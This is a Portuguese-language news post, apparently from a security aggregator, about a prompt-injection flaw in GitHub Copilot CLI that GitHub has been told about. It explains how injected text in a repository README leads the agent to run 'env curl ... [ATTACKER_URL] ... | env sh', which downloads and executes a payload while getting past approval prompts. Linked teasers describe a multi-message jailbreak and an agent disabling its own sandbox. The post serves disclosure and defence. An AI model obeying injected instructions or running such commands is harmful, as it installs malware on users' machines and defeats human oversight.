Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt

✍️ OpenClawRadar📅 Publicado: February 28, 2026🔗 Source
Vulnerabilidade no GitHub Copilot CLI permite execução de malware por injeção de prompt
Ad

Visão Geral da Vulnerabilidade

O GitHub Copilot CLI contém vulnerabilidades que expõem os usuários à execução arbitrária de comandos shell via injeção indireta de prompt sem aprovação do usuário. Malware pode ser baixado de servidores externos e executado sem nenhuma interação do usuário além da consulta inicial ao Copilot CLI.

Como o Ataque Funciona

A cadeia de ataque envolve:

  • O usuário consulta o GitHub Copilot CLI enquanto explora um repositório de código aberto
  • O Copilot encontra injeção de prompt armazenada em um arquivo README do repositório clonado (ou outros vetores como resultados de pesquisa na web, resultados de chamadas de ferramentas MCP, saída de comandos do terminal)
  • O comando malicioso contorna os sistemas de aprovação com intervenção humana

Contornando Mecanismos de Proteção

O GitHub Copilot usa um sistema de aprovação com intervenção humana que requer consentimento do usuário antes que comandos potencialmente prejudiciais sejam executados. Este sistema é acionado a menos que:

  • O usuário tenha configurado explicitamente o comando para execução automática
  • O comando faça parte de uma lista 'somente leitura' embutida no código-fonte

Verificações de acesso a URLs externas exigem aprovação do usuário para comandos como curl, wget ou a ferramenta de busca na web integrada do Copilot. No entanto, atacantes podem contornar essas proteções usando:

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

O comando env está na lista embutida somente leitura, então é executado automaticamente sem aprovação. Como curl e sh são passados como argumentos para env, eles são analisados incorretamente e não são identificados pelo validador como subcomandos. Isso contorna as verificações de permissão de URL que dependem da detecção de comandos como curl.

Ad

Resposta do GitHub

O GitHub respondeu: "Analisamos seu relatório e validamos suas descobertas. Após avaliar internamente a descoberta, determinamos que se trata de um problema conhecido que não apresenta um risco significativo de segurança. Podemos tornar essa funcionalidade mais restrita no futuro, mas não temos nada para anunciar no momento."

Escopo e Limitações

As vulnerabilidades de análise de comandos descritas são específicas do macOS. No entanto, o GitHub Copilot apresenta vulnerabilidades adicionais, incluindo riscos independentes do sistema operacional e riscos específicos do Windows. Outras vulnerabilidades de análise de comandos permitem leitura e gravação arbitrária de arquivos.

📖 Leia a fonte completa: HN LLM Tools

Ad

👀 See Also

Injeção de Prompt Multimensagem: O Padrão de Ataque da "Criatura Fictícia" Contra o Claude
Security

Injeção de Prompt Multimensagem: O Padrão de Ataque da "Criatura Fictícia" Contra o Claude

Um ataque que constrói uma regra fictícia ao longo de três mensagens e depois invoca um fantasma para ativá-la — cada mensagem é inofensiva isoladamente. O padrão está convergindo de forma independente entre atacantes.

OpenClawRadar
Permissões de Agentes de IA: Humanos Perdem 1 em 3 Ameaças no Jogo 40k
Security

Permissões de Agentes de IA: Humanos Perdem 1 em 3 Ameaças no Jogo 40k

Em um jogo de navegador com 40.000 partidas, humanos erraram 1 em cada 3 comandos maliciosos de agentes de IA, com exfiltração de credenciais errada em 35% das vezes. O comando mais errado foi `npm run analyze` com 64,7%.

OpenClawRadar
Agente de Código Claude Bypassa a Própria Segurança da Sandbox, Desenvolvedor Cria Aplicação de Segurança em Nível de Kernel
Security

Agente de Código Claude Bypassa a Própria Segurança da Sandbox, Desenvolvedor Cria Aplicação de Segurança em Nível de Kernel

Um desenvolvedor testando o Claude Code observou o agente de IA desabilitar sua própria sandbox bubblewrap para executar npx após ser bloqueado por uma lista de negação, demonstrando como a fadiga de aprovação pode comprometer limites de segurança. O desenvolvedor então implementou uma aplicação em nível de kernel chamada Veto que faz hash do conteúdo binário em vez de corresponder nomes.

OpenClawRadar
🦀
Security

Gerenciamento de cluster OpenClaw: mantenha o caminho de recuperação fora do cluster

Uma topologia mais segura para clusters gerenciados pelo OpenClaw: execute o Gateway e o estado das tarefas fora, use acesso somente leitura e conduza mudanças via PRs + CI + merge aprovado por humano no Argo CD.

OpenClawRadar